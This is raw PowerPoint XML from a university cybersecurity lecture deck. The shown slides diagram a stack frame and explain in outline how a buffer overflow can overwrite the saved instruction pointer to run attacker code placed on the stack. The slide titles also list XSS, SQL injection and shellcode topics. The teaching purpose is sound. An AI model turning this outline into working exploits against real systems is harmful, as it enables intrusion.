            <a:ext cx="1256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Memory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E4E672-CDAA-485B-9583-9699C6DF79E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11340296" y="826790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2980C7-F5FE-4849-AB85-A7375AFA2548}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11399966" y="6197293"/>
            <a:ext cx="568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369C03-1A8F-4186-9F55-472D98B5C2F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8722391" y="826790"/>
            <a:ext cx="0" cy="556305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CDC6264-C836-4FF5-9E0D-22D2C943BE57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11366759" y="826790"/>
            <a:ext cx="0" cy="556305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D67E3C3-5953-4380-8F73-9F71921817FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="941781" y="1825625"/>
            <a:ext cx="702874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0:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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1: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2: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3:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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4: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5: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6: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7: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8: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5A080C8E-FFB2-4DB6-82F5-FE53CA42626B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250217" y="4159250"/>
            <a:ext cx="980105" cy="86512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F62BF2-F3FF-4D00-BE59-120561E20530}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8779274" y="1255059"/>
            <a:ext cx="2504140" cy="70522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argv</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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58FE83-725B-4D37-ABD4-021E0287CD35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8779274" y="2035939"/>
            <a:ext cx="2504140" cy="40246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argc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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88226CC-58DF-4A7F-BA11-36AF21EA00AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8779274" y="3521889"/>
            <a:ext cx="2504140" cy="131088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buffer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8DB585E-751C-4FDD-9A5B-A85F7B19DE3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8016636" y="2232839"/>
            <a:ext cx="621041" cy="931710"/>
            <a:chOff x="7973123" y="2159723"/>
            <a:chExt cx="621041" cy="1345461"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Left Bracket 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D8D45CC-5A52-493C-AB99-F7C144AE0D7B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8414872" y="2547880"/>
              <a:ext cx="179292" cy="698382"/>
            </a:xfrm>
            <a:prstGeom prst="leftBracket">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="5715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03EADBE-EC70-4A0C-8EB5-E410A92ACFC2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="7500447" y="2632399"/>
              <a:ext cx="13454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main()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A001156-8D8D-4DD5-9C0F-2A4C3E5C60C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8032486" y="3110809"/>
            <a:ext cx="605191" cy="1721962"/>
            <a:chOff x="7988973" y="2547879"/>
            <a:chExt cx="605191" cy="1209717"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Left Bracket 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FADA7FCB-6917-4578-8649-A15085371812}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8414872" y="2547879"/>
              <a:ext cx="179292" cy="1209717"/>
            </a:xfrm>
            <a:prstGeom prst="leftBracket">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="5715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BBB9F7A-3E34-4926-B407-BB1A4EBDC88D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="7886815" y="2952683"/>
              <a:ext cx="6044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print()</a:t>
              </a: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7858E695-1AE5-40A2-81C6-A27A3CD39782}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8779274" y="2514057"/>
            <a:ext cx="2504140" cy="40246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IP = …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FC385A7-7B37-4C33-B4EA-D736063455BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8779274" y="3061224"/>
            <a:ext cx="2504140" cy="40246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IP = 7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18353E-2F42-4851-8167-95FED5933379}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8779274" y="2985249"/>
            <a:ext cx="2502734" cy="1847522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 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Speech Bubble: Rectangle 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{163FD47F-CAD5-4221-9608-D3BCA6DA5F49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5195996" y="799885"/>
            <a:ext cx="3262389" cy="890803"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 53129"/>
              <a:gd name="adj2" fmla="val 208337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Saved IP is destroyed!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Speech Bubble: Rectangle 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2298C820-ED54-43C7-828F-3570337C66A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3167344" y="3909010"/>
            <a:ext cx="3262389" cy="890803"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -86647"/>
              <a:gd name="adj2" fmla="val -58014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Program crashes :(</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="54002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44444E-6 L 2.91667E-6 0.1138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0.11389 L 2.91667E-6 -0.38356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88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0.38356 L 2.91667E-6 -0.21574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0.21574 L 2.91667E-6 -0.10208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6" grpId="2" animBg="1"/>
      <p:bldP spid="16" grpId="3" animBg="1"/>
      <p:bldP spid="16" grpId="5" animBg="1"/>
      <p:bldP spid="22" grpId="0" animBg="1"/>
      <p:bldP spid="22" grpId="1" animBg="1"/>
      <p:bldP spid="31" grpId="0" animBg="1"/>
      <p:bldP spid="31" grpId="1" animBg="1"/>
      <p:bldP spid="8" grpId="0" animBg="1"/>
      <p:bldP spid="8" grpId="1" animBg="1"/>
      <p:bldP spid="32" grpId="0" animBg="1"/>
      <p:bldP spid="33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8E4027-786D-40A1-BD1C-327D62E71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Smashing the Stack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22074A-F450-4B8D-808A-68B08CFEA9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Buffer overflow bugs can overwrite saved instruction pointers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Usually, this causes the program to crash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Key idea: replace the saved instruction pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can point anywhere the attacker wants</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But where?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Key idea: fill the buffer with malicious code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remember: machine code is just a string of bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Change IP to point to the malicious code on the stack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95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8786</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>1756</Paragraphs>
  <Slides>129</Slides>
  <Notes>1</Notes>
  <HiddenSlides>6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129</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="137" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Helvetica</vt:lpstr>
      <vt:lpstr>Helvetica Light</vt:lpstr>
      <vt:lpstr>Menlo</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>CY 2550 Foundations of Cybersecurity</vt:lpstr>
      <vt:lpstr>Focus on Attacks</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Hypertext Transfer Protocol</vt:lpstr>
      <vt:lpstr>The Web</vt:lpstr>
      <vt:lpstr>Origins</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>HTTP Protocol</vt:lpstr>
      <vt:lpstr>HTTP Request Format</vt:lpstr>
      <vt:lpstr>HTTP Request Example</vt:lpstr>
      <vt:lpstr>HTTP Request Methods</vt:lpstr>
      <vt:lpstr>HTTP Response Example</vt:lpstr>
      <vt:lpstr>HTTP Response Status Codes</vt:lpstr>
      <vt:lpstr>Sending Data Over HTTP</vt:lpstr>
      <vt:lpstr>Web Pages</vt:lpstr>
      <vt:lpstr>Mixed Origins</vt:lpstr>
      <vt:lpstr>HTTP 0.9/1.0</vt:lpstr>
      <vt:lpstr>HTTP 1.1</vt:lpstr>
      <vt:lpstr>Same Origin Policy</vt:lpstr>
      <vt:lpstr>Web Architecture circa-1992</vt:lpstr>
      <vt:lpstr>Web Architecture circa-2020</vt:lpstr>
      <vt:lpstr>Mixing Origins, Revisited</vt:lpstr>
      <vt:lpstr>Securing the Browser</vt:lpstr>
      <vt:lpstr>Same Origin Policy</vt:lpstr>
      <vt:lpstr>Same Origin Policy</vt:lpstr>
      <vt:lpstr>Cookies</vt:lpstr>
      <vt:lpstr>Cookie Example</vt:lpstr>
      <vt:lpstr>Managing State</vt:lpstr>
      <vt:lpstr>What About JavaScript?</vt:lpstr>
      <vt:lpstr>Same Origin Policy</vt:lpstr>
      <vt:lpstr>Same Origin Policy</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Focus on the Client</vt:lpstr>
      <vt:lpstr>Web Threat Model</vt:lpstr>
      <vt:lpstr>Threat Model Assumptions</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Cookie Exfiltration</vt:lpstr>
      <vt:lpstr>Types of XSS</vt:lpstr>
      <vt:lpstr>Vulnerable Website, Type 1</vt:lpstr>
      <vt:lpstr>Vulnerable Website, Type 1</vt:lpstr>
      <vt:lpstr>Reflected XSS Attack</vt:lpstr>
      <vt:lpstr>Vulnerable Website, Type 2</vt:lpstr>
      <vt:lpstr>Vulnerable Website, Type 2</vt:lpstr>
      <vt:lpstr>Stored XSS Attack</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Mitigating XSS Attacks</vt:lpstr>
      <vt:lpstr>Mitigating XSS Attacks</vt:lpstr>
      <vt:lpstr>HttpOnly Cookies</vt:lpstr>
      <vt:lpstr>Client-side XSS Filters</vt:lpstr>
      <vt:lpstr>Document Integrity</vt:lpstr>
      <vt:lpstr>Input Validation</vt:lpstr>
      <vt:lpstr>Output Sanitization</vt:lpstr>
      <vt:lpstr>Challenges of Sanitizing Data</vt:lpstr>
      <vt:lpstr>Structured Query Language (SQL)</vt:lpstr>
      <vt:lpstr>Web Architecture circa-2020</vt:lpstr>
      <vt:lpstr>SQL</vt:lpstr>
      <vt:lpstr>SQL Operations</vt:lpstr>
      <vt:lpstr>CREATE</vt:lpstr>
      <vt:lpstr>INSERT</vt:lpstr>
      <vt:lpstr>UPDATE</vt:lpstr>
      <vt:lpstr>SELECT</vt:lpstr>
      <vt:lpstr>UNION</vt:lpstr>
      <vt:lpstr>Comments</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>Server Threat Model</vt:lpstr>
      <vt:lpstr>Threat Model Assumptions</vt:lpstr>
      <vt:lpstr>Website Login Example</vt:lpstr>
      <vt:lpstr>Login Examples </vt:lpstr>
      <vt:lpstr>SQL Injection Examples</vt:lpstr>
      <vt:lpstr>SQL Injection Examples</vt:lpstr>
      <vt:lpstr>Uses for SQL Injection</vt:lpstr>
      <vt:lpstr>Blind SQL Injection</vt:lpstr>
      <vt:lpstr>Blind SQL Injection Tricks</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>SQL Injection Defenses</vt:lpstr>
      <vt:lpstr>What About NoSQL?</vt:lpstr>
      <vt:lpstr>Program Execution</vt:lpstr>
      <vt:lpstr>Compilers</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Computer Memory</vt:lpstr>
      <vt:lpstr>Program Memory</vt:lpstr>
      <vt:lpstr>Data Memory</vt:lpstr>
      <vt:lpstr>The Stack</vt:lpstr>
      <vt:lpstr>Stack Frame Example</vt:lpstr>
      <vt:lpstr>Problem</vt:lpstr>
      <vt:lpstr>Stack Frame Example</vt:lpstr>
      <vt:lpstr>Two Call Example</vt:lpstr>
      <vt:lpstr>Recursion Example</vt:lpstr>
      <vt:lpstr>Review</vt:lpstr>
      <vt:lpstr>Fun Fact</vt:lpstr>
      <vt:lpstr>Buffer Overflows</vt:lpstr>
      <vt:lpstr>Memory Corruption</vt:lpstr>
      <vt:lpstr>Threat Model</vt:lpstr>
      <vt:lpstr>Threat Model Assumptions</vt:lpstr>
      <vt:lpstr>A Vulnerable Program</vt:lpstr>
      <vt:lpstr>A Normal Example</vt:lpstr>
      <vt:lpstr>Crash</vt:lpstr>
      <vt:lpstr>Smashing the Stack</vt:lpstr>
      <vt:lpstr>Exploit v1</vt:lpstr>
      <vt:lpstr>Malicious Code</vt:lpstr>
      <vt:lpstr>Challenges to Writing Shellcode</vt:lpstr>
      <vt:lpstr>Hitting the Target</vt:lpstr>
      <vt:lpstr>Hit the Ski Slopes</vt:lpstr>
      <vt:lpstr>Exploit v2</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Mitigating Buffer Overflows</vt:lpstr>
      <vt:lpstr>Stack Canaries</vt:lpstr>
      <vt:lpstr>Stack Canaries</vt:lpstr>
      <vt:lpstr>Non-executable Stacks</vt:lpstr>
      <vt:lpstr>Non-Executable Stack</vt:lpstr>
      <vt:lpstr>Address-space Layout Randomization (ASLR)</vt:lpstr>
      <vt:lpstr>Other Targets and Methods</vt:lpstr>
      <vt:lpstr>Takeaways</vt:lpstr>
      <vt:lpstr>How do Exploits Exist?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Tools for More Secure Development</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Vulnerability Information</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>On Vulnerabilities</vt:lpstr>
      <vt:lpstr>People Don’t Patch</vt:lpstr>
      <vt:lpstr>Everybody Should Patch</vt:lpstr>
      <vt:lpstr>The Ticking Clock</vt:lpstr>
      <vt:lpstr>Responsibilities of Developers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 2550 Foundations of Cybersecurity</dc:title>
  <dc:creator>Wilson, Christo</dc:creator>
  <cp:lastModifiedBy>Wilson, Christo</cp:lastModifiedBy>
  <cp:revision>23</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-11-11T07:22:33Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-01-11T20:55:36Z</dcterms:modified>
</cp:coreProperties>
</file>